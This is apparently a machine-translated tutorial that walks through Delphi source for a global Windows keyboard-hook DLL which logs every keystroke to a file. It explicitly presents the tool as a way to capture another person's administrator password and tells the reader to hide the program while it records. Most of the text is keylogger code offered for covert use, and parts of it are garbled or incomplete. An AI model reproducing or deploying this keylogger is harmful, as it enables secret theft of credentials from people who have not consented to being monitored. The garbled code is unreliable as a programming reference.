Each program has its own living space, in the Windows system you can at any time to allow your program to perform some operations, but also trigger the message, the trigger message is divided into three, one is to operate the interface of your program, Onclick,onmousemove and so on, Another can use the Windows message mechanism to capture some system messages, but if you want to monitor any of the programs at any time, you may be able to choose the hook to implement, although there are other ways, but admittedly, hook is a relatively simple way to solve the problem.
Here's an example (using Delphi7.0 debugging to pass):
If you need to access a person's machine, that person will be typing his adminsitrator password on your machine after running \\SB, of course, you can also use hacker tools to get his password, but why not try to write a program to record all the keyboard operation?
First of all, it needs to be stated that a hook differs from a generic application and needs to appear as a global DLL, otherwise it cannot capture other information in a state where your program does not activate (you can, of course, use Windows messages, which is not discussed here).
Write a DLL to define a function
function Setkeyhook:bool;export;
function Endkeyhook:bool;export;
Procedure Keyhookexit;far;
Procedure Setmainhandle (Handle:hwnd); export;forward;
Function Keyboardhookhandler (icode:integer;wparam:wparam;lparam:lparam): Lresult;stdcall;export;
Procedure Entrypointproc (Reason:integer);
Const
Hmapobject:thandle = 0
Begin
Case reason of
Dll_process_attach:
Begin
Hmapobje CT: = createfilemapping ($FFFFFFFF, Nil, page_readwrite, 0, SizeOf (thookrec), ' _CBT ');
Rhookrec: = MapViewOfFile (Hmapobject, file_map_write, 0, 0, 0);
End;
Dll_process_detach:
Begin
Try
UnmapViewOfFile (RHOOKREC);
CloseHandle (Hmapobject);
except
end;
End
End;
End;
Procedure Keyhookexit;far;
Begin
If hnexthookproc<>0 then Endkeyhook;
Exitproc:=procsaveexit;
End
function Endkeyhook:bool;export;
Begin
If hnexthookproc<>0 then
begin
UnhookWindowsHookEx (HNEXTHOOKPROC);
Hnexthookproc:=0;
MessageBeep (0);
End;
Result:=hnexthookproc=0;
Mainhandle:=0;
End;
function Setkeyhook:bool;export;
Begin
Hnexthookproc:=setwindowshookex (Wh_keyboard, keyboardhookhandler,hinstance,0);
result:= hnexthookproc<>0;
End;
Function Keyboardhookhandler (icode:integer;wparam:wparam;lparam:lparam): Lresult;stdcall;export;
var
s:tstringlist;
Begin
If icode<0 then
begin
Result:=callnexthookex (Hnexthookproc,icode,wparam,lparam);
Exit
End;
If Lparam<0 then
begin
Exit;
End;
S:=tstringlist.create;
if FileExists (afilename) then
S . LoadFromFile (Afilename);
//Save the keystroke keyboard characters to a file
S.add (FormatDateTime (' YYYYMMDD hh:nn:ss:zzz: ', now) + char (wParam));
S.savetofile (Afilename);
S.free;
Result:=0;
End;
The project file for the DLL is defined as follows
exports
setkeyhook index 1,
endkeyhook index 2,
SetMainHandle index 3;
begin
hNexthookproc:=0;
procsaveexit:=exitproc;
DllProc := @EntryPointProc;
EntryPointProc(DLL_PROCESS_ATTACH);
end.
So the DLL is defined, and the next step is to draw an interface:
function setkeyhook:bool;external ’keyspy.dll’;
function endkeyhook:bool;external ’keyspy.dll’;
procedure SetMainHandle(Handle: HWND); external ’keyspy.dll’;
//开始捕获键盘
SetMainHandle(handle);
setkeyhook
//中止捕获键盘
endkeyhook
Then you hide it, start capturing the keyboard, and before you abort the capture, all keyboard actions are logged to the filename of your definition, note: The code is temporarily written to illustrate how to write a hook program.
In addition to the function of hook is not only simple use, this needs to rely on the flexibility of everyone to use, with a lot of Windows API to cooperate, through a lot of skills to make people unexpected effects.